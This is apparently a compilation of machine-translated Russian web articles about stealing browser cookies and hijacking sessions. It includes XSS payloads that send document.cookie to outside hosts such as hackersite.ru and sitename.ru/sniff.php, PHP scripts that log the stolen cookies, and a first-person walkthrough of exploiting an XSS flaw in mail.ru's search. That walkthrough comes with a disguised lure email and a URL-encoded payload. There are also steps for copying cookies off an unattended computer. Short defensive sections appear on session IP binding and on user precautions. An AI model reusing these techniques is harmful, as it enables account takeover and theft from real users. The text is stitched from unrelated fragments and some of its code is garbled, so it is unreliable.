Safe programming in PHP. Session theft. Methods for stealing cookies Steal cookies VKontakte
My friend forgot the password to one site. However, he had previously checked the “Remember me” checkbox in the Google Chrome browser when logging in, which allowed him to log into the site under his account. I was asked if this magical state can be transferred to another computer. It would be more correct, of course, to change or restore the password, but the acquaintance could not do this for reasons not related to the case.
How to use intercepter-ng for dummies
Despite the variety of choice of modern software, it is difficult to find programs for hacking for android better than intercepter ng. The first criterion pointing in favor of this product is its actual performance. Most of the proposed sniffers on the network are only an imitation that does not perform the declared functions.
The next positive factors are the versatility of the application and the coverage of a wide audience of users.
Computer help 939-29-71
Let's start in order. Cookies or "cookies" are very small text files - bookmarks with information.
The web server sends this information to the user's browser. where this information is stored until required. Not quite clear. Well. well.
I'll try to make it even easier. See. you have registered on any site.
At the time of registration, these very "cookies" are created.
Here they are.
Cookie Cadger
The program listens to traffic in the WiFi network, intercepts cookies and replicates the user's session in your browser, repeating requests with his credentials. Author Matthew Sullivan gave a presentation of the program on September 30 at the Derbycon hacker conference. Right during the speech, Matthew Sullivan intercepted an unsecured session with Google of one of the conference attendees via WiFi.
How to steal cookies
If, while on the site page, you enter the following text into the address bar of your Firefox or Opera browser: javascript:document.write(document.cookie); you will see something like: remixAdminsBar=0; remixGroupType=0; remixpass=********************; remixwall=0; remixInformation=0; remixMembersBar=0; remix description=0; remixautobookmark=8; remixemail=*******; remixmid=23363; remixchk=5; remixaudios=0; remixlinksBar=1; remixOfficersBar=0; remixPhotosBar=0; remixTopicsBar=0; remixvideos=0; remixRecentNews=0; remixAlbumsBar=0 Attention! .
The Complete Guide to Cross-Site Scripting
XSS is a type of software vulnerability native to Web applications that allows an attacker to inject client-side script into web pages viewed by other users Wikipedia has the following definition for XSS: “Cross-site scripting (XSS) is a type of software vulnerability native to the Web -applications (by bypassing browser security restrictions), which allows an attacker to inject client-side script into web pages viewed by other users.
Difference between cookies and sessions
Not so long ago I wrote an article on how to register and authorize users on the site.
". In this article, I'm going to break down the difference between sessions and cookies. to make your final choice.
Cookies. No, it's not about cookies, it's about your safety. Here you go to your favorite site "vkontakte" (or, for example, look at mail) on someone else's computer, refuse the "save password" option, happily look through the mail and leave. And do not think about the fact that under your name you can now go to a social network or mail.
I don't even consider the situation of a program that remembers a password without you knowing it. This is already a deliberate hack, and you will probably suspect that something like this can happen and you will not go to your favorite site on such a computer. But we can talk about simple human curiosity - we were visiting friends, and then once, and they get the opportunity to read your mail. Are you sure that they will refuse such an opportunity? Aren't you afraid that something will come up? In any case, I will put aside morality issues and just talk about how the information is stored on the computer that you can now be allowed into some site without asking for a password.
how to steal cookies
And the name of this technology is cookies.
And this is where it all started. The http protocol, on which, in fact, you browse sites (including this one) did not initially imply the possibility of maintaining a connection. That is, roughly speaking, you send a request to the site, get a response, it is displayed on the screen, and then the server does not remember anything about you. Of course, this is good when the site is purely informational and should not remember anything about you, but we live in the Web 2.0 age 😉 The natural development of the protocol is POST and GET requests, when you send some data, the server can write them to the database data, but this is not enough.
Let's look at a very simple example. Forum. So you registered, and there is a record on the forum that there is such and such a user with such and such a password and some other additional data. But now you go to the forum and log in - enter your password. Somewhere there should be information that you are logged in. On server? Of course not! It is impossible to save information on the server that authorization was made from your computer - it will not be able to distinguish you from someone else (even your IP address does not uniquely identify you)! Thus, information that authorization has occurred must be stored on your computer. That's what cookies are for, that's what they were created for.
A cookie is a small record on your computer that stores information about the site you have visited. Upon authorization, a similar entry is created, after which you can already walk around the forum, and it will recognize you. However, this will already happen automatically - thanks to the information stored in the cookie - so pretending that you are the main administrator of the forum will still not work bypassing the password verification.
Now we can return to where this article began. If you logged in somewhere without even saving your password, then it may happen that an entry has been created on the computer that now allows you to enter this resource under your name without authorization. Such an entry itself will become obsolete after a while, but you can force it to be cleared. Each browser does this differently, I'll show you how it can be done in my favorite Google Chrome. Opening the options
Go to the "advanced" tab and find the "show cookies" button
Now, of course, you can delete all cookies, but this can upset the computer owner. Therefore, for example, in the upper field you can enter the name of the site you are interested in
Then only the cookies related to this site can be cleared. You can try mine. Moreover, if you log in to my forum, and then clear your cookies, then the authorization information will be forgotten. Try it!
comments powered by
1. What is XSS
An XSS type vulnerability allows inserting arbitrary javascript code into the body of a page. An XSS attack differs from others (eg SQL injection or PHP injection) in that it acts not on the server, but on the client.
how to steal cookies
With its help, you cannot view database tables, upload a shell, etc. The most common use of XSS is to steal cookies.
Cookies (Cookies) - a small piece of data created by a web server and stored on the user's computer as a file. Typically, cookies are used to store accounts, and, most often, they contain an encoded password, login, and session ID. (Though not always)
XSS are of two types, active and passive.
Passive XSS require the victim to directly participate, for example, follow a link containing javascript code. When using this type of XSS, you cannot do without SI (Social Engineering)
Active XSS do not require any participation from the victim, she just needs to go to the page with XSS. Active XSS can be, for example, in forum posts, chats, in adding news, etc.
2.Search XSS
In this paragraph, I will tell you how to find xss
2.1 Passive XSS
To find passive XSS, just substitute in the input form if the script worked and the message "xss" appeared, then the vulnerability is present, if the script did not work, you can still try ">, this is probably the most common xss vulnerability. If neither one nor the other script worked, then there is most likely no vulnerability.
Let's look at an example.
http://miss.rambler.ru/srch/?sort=0& … amp;words=
See the "search" form? put in there "> and click "find"
A window with xss flew out, which means xss is present. (Perhaps at the time you read this article, this xss will already be fixed)
2.2 Active XSS
Such CSS can be, for example, in profile fields, when adding news in the name of the news and in the news itself (less often), in messages on forums / chats / guestbooks with html enabled. Everything is simple here, we enter the script from the previous subparagraph into the fields, and if the message is displayed on the screen, then the vulnerability is present.
Consider xss in BB tags on the forums.
you can try to stupidly insert javascript code into the tag, like this:
javascript:alert('xss')
Some tags have parameters, for example, the tag has dynsrc and lowsrc parameters, let's try to substitute the code like this:
http://www.site.ru/image.jpg dynsrc=javascript:alert('xss')
If the script worked, xss is
3.Using XSS to steal cookies
Now the most delicious
In order to steal cookies, we need a web sniffer, you can install some kind of sniffer on your hosting, or you can use an online sniffer, which are now full.
To steal cookies through passive XSS, the victim needs to follow a poisonous link. To steal cookies we will use instead another script:
we substitute the script in the link and let the victim follow it, see the sniffer log and rejoice.
Let's look at an example.
Let's take that XSS on the rambler from the previous paragraph.
Paste
">
in the search form, click "find", look at the address bar and see:
http://miss.rambler.ru/srch/?sort=0& … &words =">
We throw this link to the victim and enjoy the cookies.
Seeing such a link, the victim may suspect something, so it is advisable to encode
">
in URL Or use services like http://tinyurl.com/
Let's move on to active XSS, everything is simple here, instead of alert() we insert img = new Image(); img.src = "sniffer image address"+document.cookie;
Now we have cookies. But what to do with them? It's simple, they must be substituted instead of their own. The Opera browser has a built-in cookie editor (tools-> advanced-> cookie management), there is a plugin for firefox (I don’t remember the name, use Google)
That's all for now, perhaps the article will be supplemented
What is a cookie?
There is a mechanism that allows the http server to store some textual information on the user's computer, and then access it. This information is called a cookie. In fact, each cookie is a pair: the name of the parameter and its value. Each cookie is also assigned the domain to which it belongs. For security purposes, in all browsers, the http server is only allowed to access its own domain cookie. Additionally, cookies can have an expiration date, in which case they will be stored on the computer until this date, even if all browser windows are closed.
Why are cookies important?
In all multi-user systems, cookies are used to identify the user. Or rather, the current connection of the user with the service, the user session. If someone recognizes your cookies, they can log in on your behalf. Because at the moment, very few Internet resources check the change of the IP address during one user session.
How to change or change cookies?
Browser developers do not provide built-in tools for editing cookies. But you can get by with a regular notepad (notepad).
Step 1: create a text file with text
Windows Registry Editor Version 5.00
@="C:\\IE_ext.htm"
We save it under the name IE_ext.reg
Step 2: Using the created file, add changes to the Windows registry.
Step 3: create a text file with text
<
script
language="javascript">
external.menuArguments.clipboardData.setData("Text" , external.menuArguments.document.cookie);
external.menuArguments.document.cookie= "testname=testvalue; path=/; domain=testdomain.ru";
alert(external.menuArguments.document.cookie);
Save it as C:\IE_ext.htm
Step 4: We go to the website of interest to us.
Step 5: Right-click on an empty space on the page and select the menu item "Working with Cookies". Allow access to the clipboard. Your cookies for this site will be placed on the clipboard. You can paste their notepad (notepad) and see.
Step 6: To change some cookie, edit the C:\IE_ext.htm file, replacing testname in the name of the cookie, testvalue- on its meaning, testdomain.ru- to the website domain. Add more lines like this if necessary. For the convenience of control, I added the output of the current cookies to the script before and after the change: alert(external.menuArguments.document.cookie);
Step 7: Run Step 5 again and then refresh the page.
Bottom line: we will go to this Internet resource with updated cookies.
How to steal cookies with JavaScript?
If an attacker managed to find a way to execute an arbitrary JavaScript script on the victim's computer, then he can read the current cookies very easily. Example:
varstr=document.cookie;
But will he be able to transfer them to his site, because, as I pointed out earlier, a JavaScript script will not be able to access a site located in another domain without additional confirmation? It turns out that a JavaScript script can load any image located on any http server. At the same time, transfer any textual information in the download request to this picture. Example: http://hackersite.ru/xss.jpg?text_info So if you run this code:
varimg= newImage();
img.src= "http://hackersite.ru/xss.jpg?"+ encodeURI(document.cookie);
then the cookies will be in the request to download the "picture" and "leave" to the attacker.
How to handle such requests to upload a "picture"?
An attacker only needs to find a hosting with php support and place code like this:
$uid=urldecode($_SERVER["QUERY_STRING"]);
$fp=fopen("log.txt","a");
fputs($fp,"$uid\n");
fclose($fp);
?>
Then all query parameters to this script will be saved in the file log.txt. It remains only in the previously described JavaScript script to replace http://hackersite.ru/xss.jpg to the path to this php script.
Outcome
I have shown only the simplest way to exploit XSS vulnerabilities. But it proves that the presence of at least one such vulnerability on a multi-user Internet site can allow an attacker to use its resources on your behalf.
In which it was proposed to attend a free event dedicated to information security issues. Since the event was held in my city, I decided that I needed to go there without fail. The first lesson was devoted to vulnerabilities on sites like XSS . After the lesson, I decided that I needed to consolidate the acquired knowledge in real conditions. I chose for myself several sites that relate to my city and began to try to stick my script into all forms. In most cases, the script was filtered out. But it happened that the “alert” worked, and my message appeared. I reported the found vulnerability to the administrators, and they quickly fixed everything.
On one of those days, while checking fresh mail on mail.ru, I came across a form for searching letters in the mailbox. Occasionally I used this search to find something I needed in a pile of my old letters. Well, since in the last couple of days I have inserted my “alert” almost everywhere I could, my hand reflexively reached for this search form. I typed my script code and pressed Enter. Imagine my surprise when I saw a painfully familiar message on the screen ...
At the Open InfoSec Days lecture, the speaker said that programmers are rather skeptical about vulnerabilities of this kind, they say, “alert? Well, so what? This is not dangerous". If on other sites I was content with only this window with my message, then in this case I decided to go further and show what could come of such an “alert”.
So, the script works, which means there is a vulnerability. Therefore, you can try to run some other script. For example, a script that passes another user's cookies to us. For the script to work, we need to force the user to execute our script. This can be done by sending him a letter with the appropriate link, after clicking on which the mailbox will be searched and the code we need will be executed.
It took some time and a lot of experimentation to understand the mechanics of the vulnerability. Sometimes the script worked, sometimes it was filtered out. After some effort, empirically, it was found that the script only works 100% if the search for letters gives a positive result. That is, when a user performs a search with our script, it is necessary that at least one letter in his mailbox be found according to the specified parameters. It's not hard to set it up.
if (isset($_GET["cookie"]))
{
$text = "New cookie accept from ". $_SERVER["REMOTE_ADDR"] ." at ". date("l jS \of F Y h:i:s A");
$text .= "\n".str_repeat("=", 22) . "\n" . $_GET["cookie"]."\n".str_repeat("=", 22)."\n";
$file = fopen("sniff.txt", "a");
fwrite($file, $text);
fclose($file);
}
?>
Also, instead of an “alert”, we need a script that will transfer cookies to our sniffer. We will write this script in a separate file and upload it to our search. I created a test.js file with the necessary code and uploaded it to the hosting. The script code is this:
Img=newImage();
img.src="http://sitename.ru/sniff.php?cookie="+document.cookie;
function F() (
location="http://www.solife.ru";
}
setTimeout(F, 5000);
What I would like to explain here. Let's put ourselves in the place of the attacker. The user needs to click on the link. How to make him do it? You can promise mountains of gold and to get them you need to follow our link to the site. But I don't think it will work. The people are no longer on this (I myself constantly delete such letters, without even reading them). Therefore, we will play on human pity, since it still exists in nature. We will ask you to vote on the site for the salvation of exterminated animals. First, we will take the cookies, and then we will redirect the user to the voting site. The timeout for redirection was set to 5 seconds, otherwise the cookies simply did not have time to be transmitted to the sniffer, and the user was immediately transferred to the site about animals. Instead of "alert" I used the following script:
When the scripts were finished, I started writing a letter. Came up with the following content: 
It turned out quite cynically, but I tried to bring the conditions closer to the most realistic. At the end of the letter, a line with a script has been added, this is so that our letter will be found when we do a search. So that the line does not cause unnecessary questions, I painted it in white. I also put a space in the word "http" so that the string is not recognized and converted into a link. Otherwise, despite the fact that the script line is written in white font, the link would be highlighted in blue at the addressee, and we do not need this. Smart search will still find and recognize this string, regardless of the spaces.
E.mail.ru/cgi-bin/gosearch?q_folder=0&q_query=%27%3E%3Cscript%20src%3D%27http%3A%2F%2Fsitename.ru%2Ftest.js%27%3E%3C%2Fscript%3E
For the script, I applied URL encoding so that nothing was filtered out. I also added the “q_folder=0” parameter for the search, so that the search takes place in the Inbox folder.
The letter is ready, we send it. I used my second mailbox on the same service as the addressee. We look at what came to the other box.
Our script text is not visible as it blends into the background. Let's click on the link and see what happens. The user is moved to the search results for emails by the parameter we set. Our letter that we sent is visible in the search results. At this time, our script has already worked and sent the user's cookies to the sniffer. After 5 seconds (the time depends on the script settings), the user is redirected to the voting site.
I check my sniff.txt file:
Since my goal is not to steal other people's boxes or gain access to them, I will end the story here. But theoretically, you can replace your cookies with someone else's and gain access to someone else's mailbox. In general, if an attacker sets fire to the target, then he will find a use for the information received.
I would like to thank Sergey Belov (
- The user is prompted for a username and password.
- If authorization succeeds, a new session is created, with the value "authorization successful".
- The user is assigned a unique identifier (SID), which cannot be predicted in advance, and, therefore, cannot be selected :).
- The SID is recorded either in the browser's cookies or transmitted via the browser's address bar (if cookies are disabled).
As a result of successful authorization, the script gets access to the values of variables from the $_SESSION superglobal array, by the presence of which the script provides access to some resource, for example, the entrance to the site administration panel.
The problem is that if an attacker somehow learns the SID of another user, he can substitute it in his cookies, or the address bar of the browser and enter the site with the rights of this user.
Comment
There were several scandals a few years ago where remote bank account management systems generated a unique number (SID) simply by adding one to the last used value. Quick authorization resulted in the issuance of two SID values, let's say 40346 and 40348. Substituting the number 40347 allowed access to someone else's account :).
Currently, the SID represents a unique sequence of numbers and letters that is not tied to a meter. But how does an attacker find out someone else's SID?
There are two most common options:
1. For example, the owner of the session himself showed it, inadvertently leaving a link of this type somewhere on the forum or guestbook.
http://forum.dklab.ru/?sid=
Going to this address automatically grants the attacker the rights of the user for whom the session with the identifier is allocated.
Of course, the user session is destroyed if there is no activity after a while. And so the attacker should hurry :). On the other hand, the total prevalence of spiders (spiders) allows you to organize a purposeful automatic search for such links.
2. Even if the session is not explicitly specified in the browser line, but is stored in Cookies. An attacker still has the opportunity to take possession of the identifier. Consider a small script of the simplest guest book.
The content of the addmsg.php handler is shown below
if(!empty($_POST [ "text" ]))
{
$line = str_replace("/ ?
/s" , " " , $_POST [ "text" ]);
//write to database or file
}
else
{
exit("Error");
}
?>
Please note that the script clearly omits the call to the htmlspecialchars() function, which converts characters to >. As a result, an attacker can insert any HTML tags and JavaScript scripts into the text.
And what do we get? A small oversight (seemingly missed just some htmlspecialchars() before displaying the message to the browser), which allows loading the attacker's page in a new window, passing it values from cookies.
To deal with vulnerabilities of this kind, it is best to deal with "sustainable" methods, acting on the principle of "everything that is not allowed is prohibited." You should not hide the SID and subject the text to multi-stage checks - the probability of creating errors in this case only increases. More reliable in this case is the method of binding the SID to the IP address of the user who owns the session. This method is widely used in many well-known forums, such as phpBB.
Authorization script
if ( login and password are correct)
{
$_SESSION [ "authorized" ] = true ;
$_SESSION [ "ip" ] = $_SERVER [ "REMOTE_ADDR" ];
}
?>
Then the script that grants access to a specific resource might contain the following code
if (!empty($_SESSION [ "authorized" ]) &&
$_SESSION [ "ip" ] == $_SERVER [ "REMOTE_ADDR" ])
{
// Access to the resource is open.
}
else die("Access denied." );
?>
Those. now only the user whose IP address matches the IP address transmitted to the server during authorization can work with this session. If an attacker intercepts the session, then he has a different IP address :) - so he will be denied access.
This method is not universal and it also has weaknesses.
- If the user and the attacker access the Internet through a common proxy server, then they will have one common IP address (this is typical for networks of universities, factories and other large institutions), i.e. everyone can steal a neighbor's SID, at least by the above methods.
- If the user is using a modem and the connection is interrupted, then after the connection is restored, he will most likely be assigned a different IP address. The user may be unpleasantly surprised if he is indiscriminately enrolled in the ranks of intruders (therefore, it is not worth writing threats and appeals to conscience in protection systems - such systems also have errors). The last drawback occurs in forums, whose visitors have a habit of turning off the Internet and working offline when typing a long answer. Pressing the "Reply" button leads to the fact that all the typed information is lost, since no one cares about saving the text typed by the attacker :))).
Exit: (or rather semi-exit) Check only the first 3 digits of the IP address for identity, SID theft is still statistically unlikely, but in most cases this allows you to be more gentle about disconnecting the connection, since providers are usually allocated a non-breaking range of IP addresses, in which only the last digit changes.
Cookies - information in the form of a text file, stored on the user's computer by the website. Contains authentication data (login/password, ID, phone number, mailbox address), user settings, access status. Stored in the browser profile.
Cookie hack is the theft (or "hijacking") of a visitor's session to a web resource. Secret information becomes available not only to the sender and recipient, but also to a third party - the person who intercepted.
Cookie Hacking Tools and Techniques
Computer thieves, like their colleagues in real life, in addition to skills, dexterity and knowledge, of course, also have their own tools - a kind of arsenal of master keys and probes. Let's get acquainted with the most popular tricks of hackers, which they use to fish out cookies from the inhabitants of the Internet.
Sniffers
Special programs for monitoring and analyzing network traffic. Their name comes from the English verb "sniff" (sniff), because. literally "sniff out" transmitted packets between nodes.
But attackers use a sniffer to intercept session data, messages, and other confidential information. The object of their attacks are mostly insecure networks, where cookies are sent in an open HTTP session, that is, they are practically not encrypted. (Public Wi-Fi is the most vulnerable.)
To insert a sniffer into the Internet channel between the user's host and the web server, the following methods are used:
- "listening" to network interfaces (hubs, switches);
- branching and copying traffic;
- connection to the break of the network channel;
- analysis through special attacks that redirect victim traffic to a sniffer (MAC-spoofing, IP-spoofing).
The abbreviation XSS stands for Cross Site Scripting. It is used to attack websites in order to steal user data.
The way XSS works is as follows:
- an attacker injects malicious code (a special disguised script) onto a web page of a website, forum, or into a message (for example, when chatting on a social network);
- the victim visits the infected page and activates the installed code on his PC (clicks, follows a link, etc.);
- in turn, the activated malicious code "extracts" the user's confidential data from the browser (in particular, cookies) and sends them to the attacker's web server.
In order to “implant” a software XSS mechanism, hackers use all sorts of vulnerabilities in web servers, online services and browsers.
All XSS vulnerabilities are divided into two types:
- Passive. The attack is obtained by querying a specific web page script. Malicious code can be injected into various forms on a web page (for example, into a search bar on a site). The most susceptible to passive XSS are resources that do not filter HTML tags when data arrives;
- Active. Located directly on the server. And they are activated in the victim's browser. They are actively used by scammers in various blogs, chats and news feeds.
Hackers carefully “camouflage” their XSS scripts so that the victim does not suspect anything. They change the file extension, pass off the code as an image, motivate them to follow the link, attract them with interesting content. As a result: a PC user who has not coped with his own curiosity, with his own hand (with a mouse click) sends session cookies (with a login and password!) To the author of the XSS script - a computer villain.
Cookie spoofing
All cookies are stored and sent to the web server (from which they "came") without any changes - in their original form - with the same values, strings and other data. Intentional modification of their parameters is called cookie spoofing. In other words, when a cookie is spoofed, the attacker is wishful thinking. For example, when making a payment in an online store, the amount of payment is changed in the cookie to a smaller side - thus there is a “savings” on purchases.
Stolen session cookies on a social network from someone else's account are “inserted” into another session and on another PC. The owner of the stolen cookies gets full access to the victim's account (correspondence, content, page settings) as long as she is on her page.
"Editing" cookies is carried out using:
- functions "Manage cookies ..." in the Opera browser;
- add-ons Cookies Manager and Advanced Cookie Manager for FireFox;
- IECookiesView utilities (for Internet Explorer only);
- text editor such as AkelPad, NotePad or Windows Notepad.
Physical access to data
A very simple scheme for implementation, consists of several steps. But it is effective only if the victim's computer with an open session, for example, Vkontakte, is left unattended (and for quite a long time!):
- A javascript function is entered into the address bar of the browser, displaying all saved cookies.
- After pressing "ENTER" they all appear on the page.
- Cookies are copied, saved to a file, and then transferred to a flash drive.
- On another PC, cookies are being replaced in a new session.
- Access to the victim's account is opened.
As a rule, hackers use the above tools (+ others) both in combination (since the level of protection on many web resources is quite high) and separately (when users are overly naive).
XSS + sniffer
- An XSS script is created, which specifies the address of the online sniffer (of its own production or a specific service).
- The malicious code is saved with the .img extension (picture format).
- Then this file is uploaded to the site page, chat, or personal message - where the attack will be carried out.
- The user's attention is drawn to the created "trap" (here social engineering comes into play).
- If the "trap" works, cookies from the victim's browser are intercepted by the sniffer.
- The cracker opens the sniffer logs and extracts the stolen cookies.
- Then it performs a substitution to obtain the rights of the account owner using the above tools.
Protecting cookies from hacking
- Use an encrypted connection (using appropriate protocols and security methods).
- Do not respond to dubious links, pictures, tempting offers to get acquainted with the "new free software". Especially from strangers.
- Use only trusted web resources.
- End an authorized session by pressing the "Logout" button (and not just close the tab!). Especially if the account was logged in not from a personal computer, but, for example, from a PC in an Internet cafe.
- Do not use the "Save Password" feature of your browser. Stored registration data increases the risk of theft at times. Do not be lazy, do not spare a few minutes of time to enter a password and login at the beginning of each session.
- After web surfing - visiting social networks, forums, chats, sites - delete saved cookies and clear the browser cache.
- Update browsers and antivirus software regularly.
- Use browser extensions that protect against XSS attacks (for example, NoScript for FF and Google Chrome).
- Periodically in accounts.
And most importantly - do not lose vigilance and attention while relaxing or working on the Internet!
Loading...